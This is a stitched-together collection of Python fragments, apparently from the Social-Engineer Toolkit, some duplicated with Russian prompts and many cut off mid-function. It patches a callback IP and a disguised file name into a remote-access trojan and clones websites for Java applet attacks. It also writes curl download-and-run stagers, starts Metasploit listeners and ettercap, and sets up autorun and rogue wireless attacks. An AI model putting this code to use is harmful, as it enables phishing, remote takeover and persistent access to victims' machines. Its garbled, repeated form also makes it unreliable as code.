def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
# Load content of RATTE
############
with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
data = fileopen.read()
############
# PATCH Server IP into RATTE
############
with open(os.path.join(core.userconfigpath, "ratteM.exe"),
"wb") as filewrite:
host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y"
pers = (len(str(persistent)) + 1) * "Z"
# check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if customexe:
cexe = (len(str(customexe)) + 1) * "Q"
else:
cexe = ""
filewrite.write(
data.replace(cexe, customexe + "\x00",
1).replace(pers, persistent + "\x00", 1).replace(
host, ipaddr + "\x00",
1).replace(r_port,
str(ratteport) + "\x00", 1))
def update_config():
init_file = file("%s/config/set_config" % (definepath), "r")
new_config = file("%s/config/set_config.py" % (definepath), "w")
timestamp = str(datetime.datetime.now())
new_config.write(
"""#!/usr/bin/python\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: """
+ timestamp
+ """ #
# #
#######################################################################
CONFIG_DATE='"""
+ timestamp
+ """'\n"""
)
for line in init_file:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + "=" + value + "\n")
init_file.close()
new_config.close()
sleep(1)
from set_config import CONFIG_DATE as verify
print_info("New set_config.py file generated on: %s" % timestamp)
print_info("Verifying configuration update...")
if verify == timestamp:
print_status("Update verified, config timestamp is: %s" % timestamp)
else:
print_error("Update failed? Timestamp on config file is: %s" % verify)
print_status("SET is using the new config, no need to restart")
def update_config():
if not os.path.isdir("/etc/setoolkit"):
os.makedirs("/etc/setoolkit")
init_file = open("/etc/setoolkit/set.config", "r")
new_config = open("/etc/setoolkit/set_config.py", "w")
timestamp = str(datetime.datetime.now())
new_config.write("""#!/usr/bin/python\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set.config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set.config.py generated: """ + timestamp + """ #
# #
#######################################################################
CONFIG_DATE='""" + timestamp + """'\n""")
for line in init_file:
try:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
except:
pass
init_file.close()
new_config.close()
sleep(1)
sys.path.append("/etc/setoolkit")
from set_config import CONFIG_DATE as verify
print_info("New set.config.py file generated on: %s" % timestamp)
print_info("Verifying configuration update...")
if verify == timestamp:
print_status("Update verified, config timestamp is: %s" % timestamp)
else:
print_error("Update failed? Timestamp on config file is: %s" % verify)
print_status("SET is using the new config, no need to restart")
def start_web_server_tw(directory,port):
global httpd
try:
# import the threading, socketserver, and simplehttpserver
import thread,SocketServer,SimpleHTTPServer
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever,())
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Exiting the SET web server...")
httpd.socket.close()
def start_web_server_tw(directory, port):
global httpd
try:
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address in case something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port), SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever, ())
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Выход из веб-сервера SET...")
httpd.socket.close()
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
# Load content of RATTE
############
with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
data = fileopen.read()
############
# PATCH Server IP into RATTE
############
with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite:
host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y"
pers = (len(str(persistent)) + 1) * "Z"
# check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if customexe:
cexe = (len(str(customexe)) + 1) * "Q"
else:
cexe = ""
filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
print(core.bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""")
web_server_start()
# if we are using ettercap
if os.path.isfile(os.path.join(core.setdir, "ettercap")):
with open(os.path.join(core.setdir, "ettercap")) as fileopen5:
for line in fileopen5:
ettercap = line.rstrip()
# run in background
ettercap += " &"
# spawn ettercap or dsniff
subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# if metasploit config is in directory
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
core.print_info("Launching MSF Listener...")
core.print_info("This may take a few to load MSF...")
# this checks to see if we want to start a listener
automatic_listener = core.check_config("AUTOMATIC_LISTENER=").lower()
if automatic_listener != "off":
# specify if we are using the multi pyinjector
meta_config = "meta_config"
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
meta_config = "meta_config_multipyinjector"
# if we arent using a custom payload
if custom != 1:
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, meta_config)))
# check if we want to deliver emails or track users that click the
# link
webattack_email = core.check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
# core upx
pass #setcore.upx("src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe")
if payload_selection == "SETSHELL":
if os.path.isfile("%s/src/program_junk/web_clone/x" %(definepath)):
os.remove("%s/src/program_junk/web_clone/x" % (definepath))
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % (definepath), "%s/src/program_junk/web_clone/x" % (definepath))
# if we are targetting nix
if posix == True:
setcore.print_info("Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w")
payload_flags = webserver.split(" ")
# grab osx binary name
osx_name = setcore.generate_random_string(10,10)
downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
filewrite.write(downloader)
filewrite.close()
# grab nix binary name
linux_name = setcore.generate_random_string(10,10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath), "w")
filewrite.write(downloader)
filewrite.close()
shutil.copyfile("src/payloads/set_payloads/shell.osx", "src/program_junk/web_clone/%s" % (osx_name))
shutil.copyfile("src/payloads/set_payloads/shell.linux", "src/program_junk/web_clone/%s" % (linux_name))
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(
core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nМожет быть, вы неправильно написали адрес?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Порт RATTE Server должен прослушивать [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Введите порт RATTE Сервер должен прослушивать [8080]")
))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(
core.setprompt(["9", "2"],
"Должен ли RATTE быть постоянным [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(
core.setprompt([
"9", "2"
], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"
))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Полезная нагрузка была экспортирована в %s" %
os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(
core.setprompt(["9", "2"],
"Запустите слушатель ratteserver сейчас [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Старт ратсервер...")
ratte_listener_start(ratteport)
core.print_info("Остановка ратсервера...")
sleep(2)
valid_response = True
else:
core.print_warning(
"действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
elif trigger == 3:
payload = "openthis.wab"
else:
payload = ""
filewrite.write(
"""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))
core.print_status(
"Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'"
)
core.print_status(
"Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed."
)
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
if prompt == "yes" or prompt == "y":
# prompt the user to import the code signing certificate
cert_path = input(core.setprompt("0", "Path to the code signing certificate file (provided by CA)"))
if not os.path.isfile(cert_path):
# loop forever
while True:
core.print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path = input(core.setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path):
break
# here is where we import the certificate
try:
core.print_info("Importing the certificate into SET...")
subprocess.Popen("keytool -import -alias MyCert -file {}".format(cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the
# request process below
use_flag = 1
# exception here in case it was already imported before
except:
pass
# this will exit the menu
if prompt == "quit" or prompt == "q":
use_flag = 0
prompt = "yes"
cert_path = ""
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(
core.setprompt(["9", "2"],
"Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(
input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(
core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" %
os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(
core.setprompt(["9", "2"],
"Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning(
"valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main():
valid_site = False
valid_ip = False
# valid_persistence = False
input_counter = 0
site_input_counter = 0
ipaddr = None
website = None
# pause=input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while not valid_site and site_input_counter < 3:
website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?")
sleep(4)
return
else:
core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
site_input_counter += 1
# core.DebugInfo("site.scheme is: %s " % site.scheme)
# core.DebugInfo("site.netloc is: %s " % site.netloc)
# core.DebugInfo("site.path is: %s " % site.path)
# core.DebugInfo("site.params are: %s " % site.params)
# core.DebugInfo("site.query is: %s " % site.query)
# core.DebugInfo("site.fragment is: %s " % site.fragment)
while not valid_ip and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?")
sleep(4)
return
else:
input_counter += 1
# javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
except ValueError:
# core.print_info("Port set to default of 80")
javaport = 80
try:
ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Порт не должен быть равен javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Запуск атаки Java-апплета..")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Стартовый ратсервер...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
def prep_website():
print_info("This feature is currently under development and disabled.")
return_continue()
os.remove("src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
shutil.copyfile("src/program_junk/msf.exe",
"src/program_junk/web_clone/msf.exe")
if payload_selection == "SETSHELL":
if os.path.isfile("%s/src/program_junk/web_clone/x" % (definepath)):
os.remove("%s/src/program_junk/web_clone/x" % (definepath))
shutil.copyfile(
"%s/src/payloads/set_payloads/shell.windows" % (definepath),
"%s/src/program_junk/web_clone/x" % (definepath))
# if we are targetting nix
if posix == True:
setcore.print_info(
"Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload..."
)
filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath),
"w")
payload_flags = webserver.split(" ")
# grab osx binary name
osx_name = setcore.generate_random_string(10, 10)
downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], osx_name, osx_name, osx_name, payload_flags[1],
payload_flags[2])
filewrite.write(downloader)
filewrite.close()
# grab nix binary name
linux_name = setcore.generate_random_string(10, 10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1],
# if we are using ettercap
if os.path.isfile(os.path.join(core.setdir, "ettercap")):
with open(os.path.join(core.setdir, "ettercap")) as fileopen5:
for line in fileopen5:
ettercap = line.rstrip()
# run in background
ettercap += " &"
# spawn ettercap or dsniff
subprocess.Popen(ettercap,
shell=True,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
# if metasploit config is in directory
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
core.print_info("Launching MSF Listener...")
core.print_info("This may take a few to load MSF...")
# this checks to see if we want to start a listener
automatic_listener = core.check_config("AUTOMATIC_LISTENER=").lower()
if automatic_listener != "off":
# specify if we are using the multi pyinjector
meta_config = "meta_config"
if os.path.isfile(
os.path.join(core.setdir, "meta_config_multipyinjector")):
meta_config = "meta_config_multipyinjector"
# if we arent using a custom payload
if custom != 1:
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, meta_config)))
# check if we want to deliver emails or track users that click the
except: pass
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
core.print_info("using SET's local airbase-ng binary")
core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print("")
core.print_status("SET will now launch nano to edit the file.")
core.print_status("Press ^X to exit nano and don't forget to save the updated file!")
core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
core.return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
# DHCP SERVER CONFIG HERE
dhcp_config1 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning(
"apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
core.print_warning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting...."
)
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
core.print_info("using SET's local airbase-ng binary")
core.print_info(
"For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface."
)
core.print_info(
"""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")"""
)
print("")
core.print_status("SET will now launch nano to edit the file.")
core.print_status(
"Press ^X to exit nano and don't forget to save the updated file!")
core.print_warning(
"If you receive an empty file in nano, please check the path of your isc-dhcp-server file!"
)
core.return_continue()
def prep_website():
print_info("This feature is currently under development and disabled.")
return_continue()
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr,ratteport,persistent,customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
